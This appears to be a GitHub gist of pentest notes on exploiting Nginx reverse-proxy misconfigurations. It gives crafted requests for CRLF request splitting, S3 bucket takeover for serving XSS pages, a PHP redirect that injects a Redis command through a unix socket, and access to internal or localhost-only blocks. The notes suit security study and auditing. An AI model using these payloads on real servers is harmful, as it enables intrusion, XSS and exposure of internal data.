Skip to content

Instantly share code, notes, and snippets.

@cyberheartmi9
Created April 16, 2023 06:47
Show Gist options
  • Save cyberheartmi9/73459e3fa43e24a6058e3436aeb7aa8b to your computer and use it in GitHub Desktop.
Save cyberheartmi9/73459e3fa43e24a6058e3436aeb7aa8b to your computer and use it in GitHub Desktop.
# PT Reverse Proxy
## Exploiting HTTP Splitting with cloud storage
location ~ /docs/([^/]*/[^/]*)? {
proxy_pass https://bucket.s3.amazonaws.com/docs-website/$1.html;
}
yourdomain.com/docs/help/contact-us --> https://bucket.s3.amazonaws.com/docs-website/help/contact-us.html;
### Detect vulnerability
[^/]* could include encoded newlines when regex passed to proxy_pass the regex will be decoded.
GET /docs/%20HTTP/1.1%0d%0aHost:non-existing-bucket1%0d%0a%0d%0a HTTP/1.1
Host: yourdomain.com
after decoded newlines by proxy_pass
GET /docs-website/ HTTP/1.1
Host:non-existing-bucket1
.html HTTP/1.0
Host: bucket.s3.amazonaws.com
location ~ /images([0-9]+)/([^\s]+) {
proxy_pass https://s3.amazonaws.com/companyname-images$1/$2;
}
/images1/pwn --> https://s3.amazonaws.com/companyname-images1/pwn
/images2/pwn --> https://s3.amazonaws.com/companyname-images2/pwn
serve our xss payload
steps
1- generate error by proivde number that does't exist
/images1337/ --> generate error which expose s3 serve directory
2- create s3 with same name and serve page with xss payload
/images1337/xss.html --> https://s3.amazonaws.com/companyname-images1337/xss.html
## Controlling proxied host
location ~ /static/(.*)/(.*) {
proxy_pass http://$1-example.s3.amazonaws.com/$2;
}
yourdomain.com/static/js/
yourdomain.com/static/js/app-1555347823-min.js --> http://js-example.s3.amazonaws.com/app-1555347823-min.js
this could lead to xss by serve xss page under bucket which under attacker control
yourdomain.com/static/xss/xss.html -> http://xss-example.s3.amazonaws.com/xss.html
proxy_pass http://unix:/var/run/backend.sock:/uri
[+] bypass redis mitigations
connection will be drop if one of the following command it send
[*] The line starts with POST
[*] The line starts with Host
location ~ /static/(.*)/(.*.js) {
proxy_pass http://$1-example.s3.amazonaws.com/$2;
}
GET /static/unix:%2ftmp%2fmysocket:TEST/app-1555347823-min.js HTTP/1.1
GET /static/unix:%2ftmp%2fmysocket:TEST/app-1555347823-min.js HTTP/1.1
## Following redirects
location ~ /images(.*) {
proxy_intercept_errors on;
proxy_pass http://example.com$1;
error_page 301 302 307 303 = @handle_redirects;
}
location @handle_redirects {
set $original_uri $uri;
set $orig_loc $upstream_http_location;
proxy_pass $orig_loc;
}
serve site under attacker controll
error_page 404 405 =301 @405;
location @405 {
try_files /index.php?$args /index.php?$args;
}
<?
header('Location: http://unix:/tmp/redis.sock:\'return (table.concat(redis.call("config","get","*"),"\n").." HTTP/1.1 200 OK\r\n\r\n")\' 1 ', true, 301);
## Accessing internal Nginx blocks
[*] By using the X-Accel-Redirect response header, we can make Nginx redirect internally to serve another config block, even ones marked with the internal directive:
location /internal_only/ {
internal;
root /var/www/html/internal/;
}
### Accessing localhost restricted Nginx blocks
[*] By using a hostname with a DNS A pointer to 127.0.0.1, we can make Nginx redirect internally to blocks allowing localhost only:
location /localhost_only/ {
deny all;
allow 127.0.0.1;
root /var/www/html/internal/;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment